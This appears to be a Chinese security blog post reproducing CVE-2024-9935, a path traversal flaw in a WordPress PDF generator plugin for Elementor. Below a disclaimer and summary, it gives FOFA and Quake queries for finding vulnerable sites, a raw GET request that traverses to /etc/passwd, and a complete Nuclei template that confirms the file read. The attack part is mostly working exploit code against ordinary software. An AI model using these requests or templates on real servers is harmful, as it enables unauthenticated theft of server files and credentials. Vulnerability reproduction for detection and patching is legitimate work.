【漏洞复现】CVE-2024-9935

发布于 作者:

【漏洞复现】CVE-2024-9935

混子Hacker 混子Hacker 2024-12-04 13:17

免责声明

请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不承担任何法律及连带责任。

[
漏洞简介
]

——  
道阻且长,行则将至;行而不辍,未来可期 ——

CVE-2024-9935

WordPress 的 Elementor Page Builder 插件的 PDF 生成器插件在 1.7.5 之前的所有版本中都容易受到路径遍历的攻击,包括 1.7.5 rtw_pgaepb_dwnld_pdf() 函数。这使得未经身份验证的攻击者能够读取服务器上任意文件的内容,其中可能包含敏感信息。

漏洞信息

混子Hacker

01

资产测绘 

fofa: body="wp-content/plugins/pdf-generator-addon-for-elementor-page-builder/"
Quake:body:"wp-content/plugins/pdf-generator-addon-for-elementor-page-builder/"

混子Hacker**

02

漏洞复现 

GET /elementor-84/?rtw_generate_pdf=true&rtw_pdf_file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1
Host: xxx
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (SS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36

混子Hacker**

03

Nuclei Poc 

id: CVE-2024-9935
info:
  name: PDF Generator Addon for Elementor Page Builder <= 1.7.5 - Arbitrary File Download
  author: s4e-io
  severity: high
  description: |
    The PDF Generator Addon for Elementor Page Builder plugin for WordPress is vulnerable to Path Traversal in all versions up to, and including, 1.7.5 via the rtw_pgaepb_dwnld_pdf() function. This makes it possible for unauthenticated attackers to read the contents of arbitrary files on the server, which can contain sensitive information.
  reference:
    - https://github.com/RandomRobbieBF/CVE-2024-9935
    - https://plugins.trac.wordpress.org/browser/pdf-generator-addon-for-elementor-page-builder/trunk/public/class-pdf-generator-addon-for-elementor-page-builder-public.php#L133
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/36daf2af-1db3-4b35-8849-480212660b2f?source=cve
    - https://nvd.nist.gov/vuln/detail/CVE-2024-9935
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2024-9935
    cwe-id: CWE-22
    epss-score: 0.0009
    epss-percentile: 0.39758
  metadata:
    verified: true
    max-request: 2
    vendor: RedefiningTheWeb
    product: pdf-generator-addon-for-elementor-page-builder
    framework: wordpress
    fofa-query: body="wp-content/plugins/pdf-generator-addon-for-elementor-page-builder/"
  tags: cve,cve2024,wp,wordpress,wp-plugin,lfi,pdf-generator
flow: http(1) && http(2)
http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "/wp-content/plugins/pdf-generator-addon-for-elementor-page-builder")'
        internal: true
  - raw:
      - |
        GET /elementor-84/?rtw_generate_pdf=true&rtw_pdf_file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1
        Host: {{Hostname}}
    matchers:
      - type: dsl
        dsl:
          - regex('root:.*:0:0:', body)
          - contains(header, "application/pdf")
          - status_code == 200
        condition: and

<<<  
END

原创文章|转载请附上原文出处链接

更多漏洞|关注作者查看

作者|混子Hacker